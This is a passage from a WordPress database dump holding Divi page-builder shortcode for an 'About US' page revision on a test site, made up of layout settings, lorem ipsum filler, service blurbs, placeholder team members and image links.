background_repeat=\"repeat\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"View All\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#f7f7f7\" button_border_width=\"4px\" button_border_color=\"#f7f7f7\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#fcd21d\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','about-us','','inherit','closed','closed','','392-revision-v1','','','2020-08-07 18:11:33','2020-08-07 18:11:33','',392,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/392-revision-v1/',0,'revision','',0),(519,1,'2020-08-07 18:13:10','2020-08-07 18:13:10','[et_pb_section fb_built=\"1\" admin_label=\"Page Header\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>About US</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"About Us Section\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/business_01.jpg\" custom_margin=\"|5%||5%\" custom_margin_tablet=\"\" custom_margin_phone=\"|0px||0px\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%|||\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"5%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-200px\" box_shadow_color=\"#ffffff\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"About Us Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"27px|0px|0px|0px\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_color=\"#f7f7f7\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"10%|10%|10%|10%\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_vertical=\"15px\" box_shadow_blur=\"45px\" box_shadow_color=\"rgba(0,0,0,0.15)\" locked=\"off\"]<h2>Building the future</h2>\r\n<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis iste natus sit voluptatem accusantium doloremque laudantium totam rem aperiam, eaque ipsa quae ab.</p>\r\n<p>Illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. <span style=\"font-size: 16px;\">Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem.</span></p>\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"110px|0px|110px|0px\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"4%\" animation_starting_opacity=\"100%\" locked=\"off\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_font=\"||||||||\" text_text_color=\"#353740\" text_font_size=\"24px\" text_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. Fusce ipsum enim, <strong>ultrices at ante sollicitudin</strong>, faucibus hendrenunc. Nullam tempor nulla eu imperdiet interdum.</span></p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#d4b068\" background_color_gradient_end=\"#ffffff\" background_color_gradient_start_position=\"30%\" background_color_gradient_end_position=\"30%\" custom_padding=\"0px||110px|\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"0px|0px|0px|0px\" animation_direction=\"top\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=GQB6K7Dozms\" image_src=\"//i.ytimg.com/vi/GQB6K7Dozms/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Team Member Section\" _builder_version=\"3.22\" custom_padding=\"110px||60px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#353740\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Fearless Leaeders</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||15px|\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Eduard Ungureanu\" position=\"Project Manager\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-01.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Christina Foster\" position=\"Creative Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-06.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"100ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Jason Wardak\" position=\"Visual Media\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-04.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"200ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Other Recent Works Section\" _builder_version=\"3.22\" background_color=\"#353740\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#d4b068\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_color=\"#d4b068\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#d4b068\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>our Work</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#f7f7f7\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" admin_label=\"Other Recent Works Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-05.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" 